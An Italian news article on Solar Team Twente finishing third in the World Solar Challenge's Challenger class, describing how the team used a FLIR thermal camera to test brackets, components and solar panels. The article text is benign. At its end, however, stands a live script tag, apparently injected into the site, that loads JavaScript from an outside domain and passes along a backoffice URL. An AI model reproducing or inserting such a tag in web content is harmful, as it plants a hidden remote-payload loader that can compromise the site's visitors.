1. Home
  2. Notizie e Mercato
  3. Solar Team Twente si classifica terzo alla World Solar Challenge australiana

Solar Team Twente si classifica terzo alla World Solar Challenge australiana

Energie rinnovabili di
Una termocamera FLIR è stata utilizzata nella progettazione del veicolo solare di Solar Team Twente, vincitore del terzo posto alla World Solar Challenge nella categoria Challenger


Ogni anno dal 1987, team da tutto il mondo partecipano alla World Solar Challenge in Australia. Si tratta di una competizione amichevole durante la quale i team partono da Darwin con veicoli ad energia solare da loro progettati e costruiti, con l’obiettivo di arrivare primi ad Adelaide, lungo un percorso di circa 3.000 Km verso sud.

Solar Team Twente, un gruppo di 16 studenti provenienti dalle due Università olandesi The Saxion University of Applied Sciences e University of Twente, hanno messo in stand-by i loro studi per un anno e mezzo con lo scopo di raggiungere la prima vittoria come quinto team dell’Università di Saxion e Twente a partecipare dal 2005 e si sono qualificati al terzo posto nella competizione nella categoria Challenger.

Solar Team Twente si caratterizza per essere un’impresa studentesca completamente indipendente. I membri del team progettano, costruiscono e testano il loro veicolo da soli e cercano opportunità per collaborare con istituzioni educative, con le imprese e con i media. Il progresso tecnologico e l’innovazione sono assolutamente vitali per il team, che combina diverse tecniche in un complesso sistema per creare una macchina a energia solare. Una delle tecnologie utilizzate nel processo di sviluppo del veicolo ad energia solare, proposto durante la World Solar Challenge, è stata la termografia;la ragione principale per tale utilizzo è stata quella di confermare che le diverse parti della macchina funzionassero come calcolato e in accordo con le specifiche definite dagli organizzatori della World Solar Challenge.

Solar Team Twente ha utilizzato la termocamera FLIR T450sc con un blocco

ottico rotante, interfaccia touchscreen e con una risoluzione di

320x240 pixel. Le termocamere FLIR sono utilizzate in tutto il mondo per una vasta gamma di impieghi: ad esempio, come in questo caso, per catturare e registrare le variazioni in tempo reale, permettendo agli ingegneri e ai ricercatori di vedere e misurare accuratamente partner di calore, dissipazione, perdite ed altri fattori termici negli equipaggiamenti, prodotti e processi.

Le termocamere palmari sono perfette per il test sul campo: “Utilizzare questa termocamera è stato conveniente in quanto abbiamo potuto utilizzarla per test differenti in differenti luoghi” spiega Jelle Wagenvoort, Technical Manager e membro del team di management di Solar Twente “era la prima volta che lavoravamo con una termocamera e siamo stati molto contenti della qualità ed accuratezza delle immagini termiche”.

Grazie alla termocamera è stata misurata la crescente temperatura delle staffe a differenti velocità in modo tale che fosse possibile confermare la loro idoneità rispetto alle specifiche del regolamento. Inoltre, è stata ispezionata l’ingegneria della macchina solare tramite la termocamera, nel momento in cui è stata testata la sua capacità massima. “Nonostante il sistema ingegneristico del veicolo abbia i sensori di calore installati, un’immagine termica fornisce molte più informazioni” afferma Chiel De Wit, Chief Product di Solar Team Twente “Inoltre, l’uso di un termocamera ci ha aiutati molto durante lo sviluppo della

nostra macchina solare: senza l’utilizzo di un

termocamera non avremmo potuto sapere se alcune componenti stavano

lavorando così come pensavamo stessero facendo”.

I pannelli solari sul veicolo solare, convertendo l’energia solare in elettricità, sono senza dubbio la parte più importante. Le celle fotovoltaiche devono essere affidabili ed in grado di produrre elettricità per tutte la durata della gara. Una termocamera può giocare un ruolo importante per assicurare buona qualità. L’utilizzo delle termocamere per la valutazione dei pannelli solari offre una serie di vantaggi: le anomalie possono essere facilmente identificate su un’immagine termica – al contrario della maggior parte dei metodi - e le termocamere possono essere utilizzate per controllare i pannelli durante il funzionamento.

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.8619702872729552" type="text/javascript"></script>